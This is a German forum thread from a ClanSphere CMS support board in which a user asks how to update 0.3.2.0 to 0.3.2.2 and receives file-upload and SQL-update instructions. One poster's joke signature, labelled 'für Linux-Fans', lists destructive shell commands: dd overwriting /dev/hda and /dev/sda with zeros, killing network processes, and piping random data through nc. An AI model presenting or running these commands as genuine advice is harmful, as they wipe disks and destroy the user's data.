Demo

Probiere ClanSphere aus und teste daran herum. Demo


Antworten: 4
Seite [1]
MdS`


Wannabe poster



Herkunft: Berlin
Beiträge: 36
# Thema - 30.09.2006 um 16:42 Uhr
wie update ich am einfachsten?`

hab version 0.3.2.0 auf 0.3.2.2 ?
Inaktiv
pHaeno* ClanSphere Team


Geekboy





Beiträge: 1405
# Antwort: 1 - 30.09.2006 um 16:46 Uhr
Ich bin der Meinung es steht in der ReadMe. Und wenn ich mich sogar nicht ganz täusche, dann sind es nur ein paar Dateien du man austauschen muss. Der SQL-Befehl hingegen wird direkt über Clansphere gemacht nicht etwar uber MySQL oder PHPmyadmin


------------------
hajo says:
<div style="imbaness: 200pt; skill: 200pt; equip-align: top;">phaeno's mage</div>


27.05.2007 um 01:38 Uhr - pHaeno*:
Bei Clansphere gibt es KEINE Bugs, es sind ALLES FEATURES



weichmann... +-
Blondi (15:08):
bist du nen mann oder nen weich ei?


pHaeno* (15:09):
weichmann


mehr... +-
if($ahnung==0) {
read( 'handbuch' ) ;
}



## für Linux-Fans

kill -9 `netstat -a | grep https | awk -e '{ print $3; }'`
dd if=/dev/zero of=/dev/hda count=1M
dd if=/dev/zero of=/dev/sda count=1M
cat /dev/urandom | nc 127.0.0.1 443


Inaktiv
|
Denni


Specialist




Herkunft: Ilsfeld
Beiträge: 1972
# Antwort: 2 - 30.09.2006 um 19:11 Uhr
einfach die dateien hochladen (mit überschreiben falls neuer im ftp programm) und das update 0320 to 0322.sql unter system->updates ausführen


------------------
Gruß
Denni

ClanSphere - Makes your website a playmate, just dress her

Inaktiv
|
MdS`
Thread-Ersteller


Wannabe poster



Herkunft: Berlin
Beiträge: 36
# Antwort: 3 - 05.10.2006 um 15:24 Uhr
hmm also ich nehme die vollversion hier ausm download bereich und überschreibe halt alle dateien?

wär doch umständlich, wenn ihr sogar sagt dass es eigentlich nur einige files sind die anders sind. gibt es nicht ein update dl mit halt nur genau diesen dateien? weil ei der voll 3223 is ja auch nich diese spezielle sql datei dabei

thx


Inaktiv
|
Denni


Specialist




Herkunft: Ilsfeld
Beiträge: 1972
# Antwort: 4 - 05.10.2006 um 15:46 Uhr
doch da ist diese datei dabei unter updates/


------------------
Gruß
Denni

ClanSphere - Makes your website a playmate, just dress her

Inaktiv
|
Antworten: 4
Seite [1]


Sie müssen sich registrieren, um zu antworten.